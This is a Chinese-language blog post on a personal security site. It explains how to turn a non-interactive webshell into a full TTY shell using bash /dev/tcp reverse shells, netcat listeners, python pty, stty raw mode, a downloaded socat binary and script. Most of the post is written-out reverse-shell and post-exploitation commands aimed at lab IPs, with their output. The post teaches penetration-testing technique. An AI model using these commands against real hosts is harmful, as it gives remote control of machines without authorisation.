<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="实现交互式shell的几种方式"><meta name="keywords" content=""><meta name="author" content="Kevin_xiao"><meta name="copyright" content="Kevin_xiao"><title>实现交互式shell的几种方式 | Kevin_xiao's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.1"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  hexoVersion: '6.3.0'
} </script><meta name="generator" content="Hexo 6.3.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-python-pty-%E6%96%B9%E5%BC%8F"><span class="toc-number">1.</span> <span class="toc-text">1. python pty 方式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E5%8D%87%E7%BA%A7nc%E4%B8%BA%E5%AE%8C%E5%85%A8%E4%BA%A4%E4%BA%92"><span class="toc-number">2.</span> <span class="toc-text">2. 升级nc为完全交互</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E4%BD%BF%E7%94%A8socat"><span class="toc-number">3.</span> <span class="toc-text">3. 使用socat</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-script%E8%8E%B7%E5%8F%96pty"><span class="toc-number">4.</span> <span class="toc-text">4. script获取pty</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.jpg"></div><div class="author-info__name text-center">Kevin_xiao</div><div class="author-info__description text-center"></div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/kevinx1ao">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">3</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/bj.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Kevin_xiao's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/friends">Friends</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">实现交互式shell的几种方式</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2024-02-01</time><div class="post-meta-wordcount"><span>Word count: </span><span class="word-count">963</span><span class="post-meta__separator">|</span><span>Reading time: 3 min</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>当我们拿到一个webshell的时候，我们能够执行一些命令，但是这些命令都是非交互的，也就是说不存在上下文的概念。当我们想使用vim、top等命令时，webshell就无能为力了。</p>
<p>那我们怎么获取一个可交互的webshell呢？</p>
<h2 id="1-python-pty-方式"><a href="#1-python-pty-方式" class="headerlink" title="1. python pty 方式"></a>1. python pty 方式</h2><p>一般我们都会使用nc来接收反弹来的shell，只需要在目标上(以linux为例)执行：</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/192.168.2.134/4444 0&gt;&amp;1</span><br></pre></td></tr></table></figure>

<p>本地接收一下就ok了，但是反弹回来的shell，或多或少都会存在问题，比如当我想使用top命令时就会提示没有 <code>tty</code>。简单的来说就是没有上下文环境，这样的话，<code>vim</code>，<code>sudo</code>等操作都做不了，有时候还需要其他工具，很麻烦。</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">C:\Users\w5023</span><br><span class="line">λ nc -lvvp 4444</span><br><span class="line">listening on [any] 4444 ...</span><br><span class="line">connect to [192.168.2.134] from DESKTOP-IBUUT6H.lan [192.168.2.134] 30688</span><br><span class="line">ubuntu@ubuntu:~$ whoami</span><br><span class="line">whoami</span><br><span class="line">ubuntu</span><br><span class="line">ubuntu@ubuntu:~$ top</span><br><span class="line">top</span><br><span class="line">top: failed tty get</span><br><span class="line">ubuntu@ubuntu:~$ tty</span><br><span class="line">tty</span><br><span class="line">not a tty</span><br></pre></td></tr></table></figure>

<p>但是如果发现对方机器上有 python 的话，我们可以：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python -c &#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://saucer-man.com/usr/uploads/2019/06/3893556663.png"><img src="https://saucer-man.com/usr/uploads/2019/06/3893556663.png"></a></p>
<p>可以实现简单的tty，但是这种方式有个问题，当我们ctrl+C的时候，所有连接都会断掉，又需要重新来一遍，而且vim虽然可以用，也有点问题，同时没有记录，无法使用上方向键执行上条命令。</p>
<h2 id="2-升级nc为完全交互"><a href="#2-升级nc为完全交互" class="headerlink" title="2. 升级nc为完全交互"></a>2. 升级nc为完全交互</h2><p>整个流程是在第一步的基础上，但是需要用到的工具在linux上，所以把攻击机切换为linux。</p>
<p>现在攻击机和目标机分别为：</p>
<ul>
<li>攻击机 Linux 192.168.81.160</li>
<li>目标机 Linux 192.168.81.162</li>
</ul>
<p>简单把反弹一个完全交互shell的过程写出来</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"># 攻击机本地执行</span><br><span class="line"># 首先检查当前终端和STTY信息</span><br><span class="line">$ echo $TERM      </span><br><span class="line">$ stty -a </span><br><span class="line"># nc开启监听</span><br><span class="line">$ nc -lvvp 4444</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://saucer-man.com/usr/uploads/2019/06/9701011.png"><img src="https://saucer-man.com/usr/uploads/2019/06/9701011.png"></a></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"># 目标机执行</span><br><span class="line">$ bash -i &gt;&amp; /dev/tcp/192.168.81.160/4444 0&gt;&amp;1</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"># 此时攻击机已经获取到了bash</span><br><span class="line"># 接下来执行</span><br><span class="line">$ python -c &#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;  //启用python交互式</span><br><span class="line"># 把它丢到后台挂起</span><br><span class="line">$ ctrl + z   </span><br><span class="line"># 重置stty，也就意味着你看不到输入的内容</span><br><span class="line">$ stty raw -echo  </span><br><span class="line"># 把后台挂起的程序调回前台</span><br><span class="line">$ fg  </span><br><span class="line"># 完全刷新终端屏幕</span><br><span class="line">$ reset  </span><br><span class="line"># 接下来设置环境变量，根据第一步得到的环境变量来设置</span><br><span class="line">$ export SHELL=bash   </span><br><span class="line">$ export TERM=xterm-256color   </span><br><span class="line">$ stty rows 行数 columns 列数  </span><br></pre></td></tr></table></figure>

<p>到这里，就可以得到一个完美的shell了。</p>
<h2 id="3-使用socat"><a href="#3-使用socat" class="headerlink" title="3. 使用socat"></a>3. 使用socat</h2><p>socat是类Unix系统下的一个工具，可以看作是 nc 的加强版。我们可以使用socat来传递完整的带有tty的TCP连接。缺点也很明显，<strong>只能在linux下面运行</strong></p>
<p>下载地址：<a target="_blank" rel="noopener" href="https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat">https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64&#x2F;socat</a></p>
<p>使用起来也很简单。</p>
<ul>
<li><p>攻击机：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"># 首先安装</span><br><span class="line">$ sudo apt install socat</span><br><span class="line"># 执行</span><br><span class="line">$ socat file:`tty`,raw,echo=0 tcp-listen:4444</span><br></pre></td></tr></table></figure>
</li>
<li><p>目标机</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"># 把socat上传到目标机器上或者直接下载</span><br><span class="line">$ wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat</span><br><span class="line"># 运行</span><br><span class="line">$ chmod +x /tmp/socat</span><br><span class="line">$ /tmp/socat exec:&#x27;bash -li&#x27;,pty,stderr,setsid,sigint,sane tcp:192.168.81.160:4444</span><br></pre></td></tr></table></figure></li>
</ul>
<p>这种方式基本和ssh类似，ctrl+C也不会直接断开。</p>
<h2 id="4-script获取pty"><a href="#4-script获取pty" class="headerlink" title="4. script获取pty"></a>4. script获取pty</h2><p>我们可以使用 Linux 系统下的 <code>script</code> 命令，在弹回来的 shell 下创建一个带有 tty 的 shell, 这样就可以勉强使用一下 <code>top</code> 和 <code>vim</code> :</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">$ script /dev/null</span><br></pre></td></tr></table></figure>

<p>如果不加 <code>/dev/null</code> 的话，会在当前路径下生成一个名字是 <code>typescript</code> 的文件，记录着在 script 生命周期里你执行的所有命令和结果。</p>
<p>结果：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">C:\Users\w5023</span><br><span class="line">λ nc -lvvp 4444</span><br><span class="line">listening on [any] 4444 ...</span><br><span class="line">connect to [192.168.2.134] from DESKTOP-IBUUT6H.lan [192.168.2.134] 30567</span><br><span class="line">ubuntu@ubuntu:~$ tty</span><br><span class="line">tty</span><br><span class="line">not a tty</span><br><span class="line">ubuntu@ubuntu:~$ script /dev/null</span><br><span class="line">script /dev/null</span><br><span class="line">Script started, file is /dev/null</span><br><span class="line">ubuntu@ubuntu:~$ tty</span><br><span class="line">tty</span><br><span class="line">/dev/pts/1</span><br></pre></td></tr></table></figure>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">Kevin_xiao</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://kevinx1ao.github.io/2024/02/01/实现交互式shell的几种方式/">https://kevinx1ao.github.io/2024/02/01/实现交互式shell的几种方式/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="next-post pull-right"><a href="/2024/02/01/%E5%90%8E%E6%B8%97%E9%80%8F%E4%B9%8B%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD(Linux%E7%AF%87)/"><span>后渗透之文件下载(Linux篇)</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(/img/bj.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2023 - 2024 By Kevin_xiao</div><div class="framework-info"><span>Driven - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/lib/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.1"></script><script src="/js/fancybox.js?version=1.9.1"></script><script src="/js/sidebar.js?version=1.9.1"></script><script src="/js/copy.js?version=1.9.1"></script><script src="/js/fireworks.js?version=1.9.1"></script><script src="/js/transition.js?version=1.9.1"></script><script src="/js/scroll.js?version=1.9.1"></script><script src="/js/head.js?version=1.9.1"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>